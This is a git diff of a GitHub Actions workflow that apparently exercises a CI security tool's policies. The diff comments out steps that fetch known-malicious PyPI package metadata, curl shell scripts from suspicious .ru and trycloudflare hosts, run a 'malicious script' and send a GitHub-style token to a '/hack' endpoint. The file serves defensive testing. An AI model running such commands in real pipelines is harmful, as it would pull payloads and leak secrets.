Update INVISIRISK.yml

diff --git a/.github/workflows/INVISIRISK.yml b/.github/workflows/INVISIRISK.yml
--- a/.github/workflows/INVISIRISK.yml
+++ b/.github/workflows/INVISIRISK.yml
@@ -53,45 +53,45 @@ jobs:
       #   continue-on-error: true
       #   run: pip install numpy==1.9.3 --no-deps --index-url https://test.pypi.org/simple/
 
-      - name: Install MALWARE package (Custom Builtins)
-        continue-on-error: true
-        run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/abilityrequests-0.0.5-py2.py3-none-any.whl.metadata
+     # - name: Install MALWARE package (Custom Builtins)
+     #   continue-on-error: true
+      #  run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/abilityrequests-0.0.5-py2.py3-none-any.whl.metadata
 
-      - name: Install MALWARE package (Custom Builtins)
-        continue-on-error: true
-        run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/moxel-python-driver-0.0.1-py2.py3-none-any.whl.metadata
+    #  - name: Install MALWARE package (Custom Builtins)
+     #   continue-on-error: true
+     #   run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/moxel-python-driver-0.0.1-py2.py3-none-any.whl.metadata
 
-      - name: Install MALWARE package (Custom Builtins)
-        continue-on-error: true
-        run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/phishermanx-4.0.1-py2.py3-none-any.whl.metadata
+     # - name: Install MALWARE package (Custom Builtins)
+     #   continue-on-error: true
+     #   run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/phishermanx-4.0.1-py2.py3-none-any.whl.metadata
 
-      - name: Install MALWARE package (Custom Builtins)
-        continue-on-error: true
-        run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/shiva123456-23.99.0-py2.py3-none-any.whl.metadata
+    # - name: Install MALWARE package (Custom Builtins)
+    ##    continue-on-error: true
+     #   run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/shiva123456-23.99.0-py2.py3-none-any.whl.metadata
 
-      - name: Install MALWARE package (Custom Builtins)
-        continue-on-error: true
-        run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/yuzo-1.0.0-py2.py3-none-any.whl.metadata
+     # - name: Install MALWARE package (Custom Builtins)
+     #   continue-on-error: true
+      #  run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/yuzo-1.0.0-py2.py3-none-any.whl.metadata
 
-      - name: Install KEV package (Custom Builtins)
-        continue-on-error: true
-        run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/langflow-base-0.0.50-py2.py3-none-any.whl.metadata
+     # - name: Install KEV package (Custom Builtins)
+     #   continue-on-error: true
+     #   run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/langflow-base-0.0.50-py2.py3-none-any.whl.metadata
         
-      - name: Install KEV package (Custom Builtins)
-        continue-on-error: true
-        run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/salt-2015.8.0rc1-py2.py3-none-any.whl.metadata
+     # - name: Install KEV package (Custom Builtins)
+    #    continue-on-error: true
+     #   run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/salt-2015.8.0rc1-py2.py3-none-any.whl.metadata
 
-      - name: Curl blacklisted host (Custom Builtins)
-        run: curl https://ethical-points-competitive-fluid.trycloudflare.com/QFB3wsf/7/8/9/uju.wsf
+    #  - name: Curl blacklisted host (Custom Builtins)
+    #    run: curl https://ethical-points-competitive-fluid.trycloudflare.com/QFB3wsf/7/8/9/uju.wsf
 
-      - name: Curl blacklisted host (Custom Builtins)
-        run: curl https://f3n7k.798u-g.ru/q6a13xi27h.sh
+   #   - name: Curl blacklisted host (Custom Builtins)
+   #    run: curl https://f3n7k.798u-g.ru/q6a13xi27h.sh
 
-      - name: Curl blacklisted host (Custom Builtins) - latest
-        run: curl https://c8r5q.3-f72v.ru/wie4js1mje.sh
+    #  - name: Curl blacklisted host (Custom Builtins) - latest
+    #    run: curl https://c8r5q.3-f72v.ru/wie4js1mje.sh
 
-      - name: Content length download
-        run: curl  -o 1GB.bin "https://nbg1-speed.hetzner.com/1GB.bin"
+   #   - name: Content length download
+    #    run: curl  -o 1GB.bin "https://nbg1-speed.hetzner.com/1GB.bin"
 
       # - name: Install with different checksum
       #   continue-on-error: true
@@ -116,27 +116,27 @@ jobs:
       #   continue-on-error: true
       #   run: sleep 200
 
-      - name: 😈 Execute malicious script
-        run: bash run_malicious_scripts.sh
+    #  - name: 😈 Execute malicious script
+   #     run: bash run_malicious_scripts.sh
 
-      - name: Secret Leak Policy
-        run: |
-            curl -k -X GET https://vbirmock.free.beeceptor.com/hack \
-              -H "Content-Type: application/json" \
-              -d '{
-              "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
-            }'
-            echo "Exit code: $?"
+   #   - name: Secret Leak Policy
+     #   run: |
+       #     curl -k -X GET https://vbirmock.free.beeceptor.com/hack \
+         #     -H "Content-Type: application/json" \
+         #     -d '{
+        #      "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
+         #   }'
+          #  echo "Exit code: $?"
 
       # - name: Mock API key exposure request
       #   run: |
       #     curl "https://example.com/data?api_key=ghp_N4GLp6K2gwqWupGTRjz9P7AOth62XP5OhliA"
           
-      - name: Response Status Code Policy (Trigger 400 Bad Request)
-        run: curl -k -X POST https://api.github.com/endpoint
+   #   - name: Response Status Code Policy (Trigger 400 Bad Request)
+    #    run: curl -k -X POST https://api.github.com/endpoint
 
-      - name: Mime Type Policy
-        run: curl -s -L "https://tinyurl.com/invisirisk"
+   #   - name: Mime Type Policy
+   #     run: curl -s -L "https://tinyurl.com/invisirisk"
 
       # - name: Send POST request with curl
       #   run: |
@@ -184,6 +184,7 @@ jobs:
           app_token: ${{ secrets.IR_API_KEY_CB_STAGE }}
           send_job_status: "true"
           debug: "true"
+
 
 
 
